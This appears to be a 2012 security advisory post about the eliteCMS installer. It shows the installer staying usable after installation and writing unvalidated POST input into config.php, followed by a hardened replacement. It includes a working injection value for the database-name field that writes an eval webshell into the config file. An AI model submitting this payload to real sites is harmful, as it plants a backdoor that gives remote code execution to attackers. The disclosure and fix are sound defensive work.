eliteCMS: installer not locked after install + one-liner webshell written to config (security vulnerability)
Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation has finished, so anyone who can reach the installer URL can run the installation again.

A second problem is that the installer writes its input straight into admin/includes/config.php, which lets a one-line backdoor be planted there.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation. Because each one is interpolated into a double-quoted PHP source string, a value containing a closing quote or a "?>" tag ends the string or the PHP block it sits in. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
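A hardened version of the step-4 config writer, added here as an example for this post and not eliteCMS's own code: it refuses to run once a lock file exists, whitelist-validates each session value before use, and emits the values as PHP literals via var_export() so text like "?><?php" stays inside the string instead of becoming code. The lock file name install.lock and the switch from the removed mysql_* functions to mysqli are assumptions.

```php
<?php
// Added hardened example (not eliteCMS code). Same $_SESSION keys and
// target path as the installer; the install.lock name is an assumption.
session_start();

$file = __DIR__ . '/../admin/includes/config.php';
$lock = __DIR__ . '/install.lock';

// 1. Never run the installer twice: the first successful run drops a lock.
if (file_exists($lock)) {
    http_response_code(403);
    exit('Installation already completed; delete the install directory.');
}

// 2. Whitelist-validate every value before it goes anywhere near PHP source.
function valid_identifier($s) {           // DB name / DB user
    return is_string($s) && preg_match('/^[A-Za-z0-9_]{1,64}$/', $s) === 1;
}
function valid_host($s) {                 // hostname or IP, optional :port
    return is_string($s) && preg_match('/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/', $s) === 1;
}
if (!valid_host($_SESSION['DB_SERVER'] ?? null)
    || !valid_identifier($_SESSION['DB_NAME'] ?? null)
    || !valid_identifier($_SESSION['DB_USER'] ?? null)
    || !is_string($_SESSION['DB_PASS'] ?? null)) {
    http_response_code(400);
    exit('Invalid database settings.');
}

// 3. Build config.php from PHP literals, not interpolated raw text.
//    var_export() yields a single-quoted, escaped string, so quotes,
//    backslashes or a "?>" inside the value stay data, not code.
$write = "<?php\n";
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $write .= sprintf("define(%s, %s);\n",
                      var_export($key, true), var_export($_SESSION[$key], true));
}
$write .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
$write .= "if (!\$connection) {\n";
$write .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
$write .= "}\n";

// 4. Write under an exclusive lock, then create the install lock file.
if (file_put_contents($file, $write, LOCK_EX) === false) {
    exit('Could not write config.php');
}
file_put_contents($lock, date('c'));
```

The validation alone would already reject the POSTed name shown above; the var_export() step is the second layer, so that even a value the whitelist lets through (such as a password containing quotes) cannot alter the generated source.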